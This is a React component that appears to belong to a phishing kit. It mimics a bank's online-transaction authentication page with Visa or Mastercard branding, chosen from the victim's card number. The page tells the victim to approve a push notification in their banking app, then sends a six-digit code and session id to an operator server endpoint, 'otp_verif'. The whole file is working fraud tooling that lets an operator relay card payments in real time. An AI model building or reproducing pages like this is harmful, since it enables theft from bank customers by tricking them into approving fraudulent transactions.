import React, { useEffect, useState } from "react"
import logo_prim from './qatar/assets/pci.jpg'
import axios from "axios"
import { useNavigate } from "react-router-dom"
import { useTranslation } from "react-i18next"
import VisaImage from './qatar/assets/visa.png'
import MasterImage from './qatar/assets/idcheck2.png'

export default function Default_Push({setLoading}) {
  const [code, setCode] = useState("");

  const handleCodeChange = (e) => {
    const value = e.target.value.replace(/\D/g, "").slice(0, 6);
    setCode(value);
  };

    const { t } = useTranslation();

  const [submitBtnContent, setSubmitBtnContent] = useState(t('submit'));
  const [submitBtnDis, setSubmitBtnDis] = useState(false)
  const navigate = useNavigate()
  const [input1Value, setInput1Value] = useState("")
  const today = new Date()
  const formattedDate = `${today.getDate().toString().padStart(2, "0")}/${(
    today.getMonth() + 1
  )
    .toString()
    .padStart(2, "0")}/${today.getFullYear()}`

  const handleCodeSubmit = async () => {
    setSubmitBtnContent(<div className="inputLoader"></div>)
    setSubmitBtnDis(true)
    const dataToSend = {
      uuId: localStorage.getItem("uuId"),
      code: input1Value,
    }

    try {
      const response = await axios.post(
        `${process.env.REACT_APP_SERVER_URL}/api/otp_verif`,
        dataToSend
      )
      if (response.status === 200) {
        setLoading(true)
      }
    } catch (error) {
      setTimeout(() => {
        setSubmitBtnDis(false)
        setSubmitBtnContent("Submit")
      }, 3000)
    }
  }

  useEffect(() => {
    updateSubmitBtnDisabled()
  }, [input1Value])

  const updateSubmitBtnDisabled = () => {
    console.log(
      `KD {input1Value.length} + KD {input2Value.length} + KD {input3Value.length}`
    )
    // Check conditions for enabling/disabling submit button

    setSubmitBtnDis(false) // Enable submit button if all inputs are filled

    if (input1Value.length > 5) {
      setSubmitBtnDis(false) // Enable submit button if all inputs are filled
    } else {
      setSubmitBtnDis(true) // Disable submit button if any input is empty
    }
  }

  const firstDigit = localStorage.getItem('first-digit');

  // Determine the image source and alt text
  let imageSrc, altText;
  if (firstDigit === '4') {
    imageSrc = VisaImage;
    altText = 'Visa';
  } else if (firstDigit === '5') {
    imageSrc = MasterImage;
    altText = 'Mastercard';
  } else {
    imageSrc = null; // No image if not 4 or 5
    altText = 'No card';
  }

  return (
    <div className="h-full  font-sans text-black">
      <div className="mx-auto h-full w-full max-w-md ">
        <main className="px-2 h-full overflow-y-scroll pt-3 pb-8">
          {/* Logos */}
          <div className="flex items-start justify-between">

            <img
              src={logo_prim}
              alt=""
              className="h-8 w-auto object-contain"
            />
            <img
              src={imageSrc}
              alt=""
              className="h-12  "
            />
          </div>

          {/* Divider */}
          <div className="mt-3 border-t border-neutral-400" />

          <div className="mt-8">
            <h1 className="text-sm font-semibold">
              Authentication of Online Transaction
            </h1>
{localStorage.getItem('push_text') ? (
              <p className="mt-4 text-sm font-semibold leading-6">
                {localStorage.getItem('push_text')}
            </p>
) : (
  <>
            <p className="mt-4 text-sm font-semibold leading-6">
              A push notification has been sent to your banking app. Kindly
              click on the push notification and press{" "}
              <span className="font-medium">"APPROVE"</span> button to proceed
              with the online transaction.
            </p>

            <p className="mt-4 text-sm  font-semibold leading-6">
              Your push notification will expire after 100 seconds.
            </p>

            <div className="mt-4">
              <p className="text-sm font-semibold ">
                Just approved the transaction?
              </p>

              <button
                type="button"
                className="mt-1 text-sm font-semibold text-[#5A9EBC] underline"
              >
                Click here to complete your transaction
              </button>
            </div>

            {/* CANCEL */}
            <div className="mt-14 flex justify-end">
              <button
                type="button"
                className="text-sm font-bold underline"
              >
                Cancel
              </button>
            </div>
  </>
            )}
          </div>
        </main>
      </div>
    </div>
  );
}